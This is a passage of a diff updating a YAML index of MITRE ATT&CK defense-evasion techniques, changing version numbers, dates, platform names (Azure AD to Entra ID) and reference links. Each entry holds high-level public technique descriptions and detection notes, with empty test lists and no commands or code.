@@ -4274,9 +4385,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4338,8 +4490,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5482,7 +5618,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5694,16 +5833,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
